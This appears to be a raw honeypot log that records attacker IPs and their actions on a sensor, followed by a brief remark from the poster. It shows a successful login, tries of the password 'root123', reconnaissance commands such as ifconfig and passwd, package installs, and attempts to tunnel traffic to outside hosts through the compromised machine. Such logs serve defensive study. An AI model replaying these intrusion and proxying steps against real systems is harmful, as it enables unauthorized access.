Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: address
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: ipaddress
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: ipadrss
Sensor: rom3
Hacker: 217.23.7.25
MyIP: 172.17.0.3
Action: direct_request
Content: ori:(u'127.0.0.1', 22), dest:(u'practicemanager.xero.com', 443)
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: passwd
Sensor: rom3
Hacker: 217.23.3.138
MyIP: 172.17.0.3
Action: direct_request
Content: ori:(u'localhost', 8080), dest:(u'157.240.20.35', 80)
Sensor: rom3
Hacker: 217.23.3.138
MyIP: 172.17.0.3
Action: direct_request
Content: failed
Sensor: rom3
Hacker: 217.23.3.138
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: root123
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: root123
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: /sbin/ifconfig
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: apt-get install net-tools
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content:
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: /sbin/ifconfig/sbin/ifconfig(ESC)[5~
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: /sbin/ifconfig

It even installed pip and python for me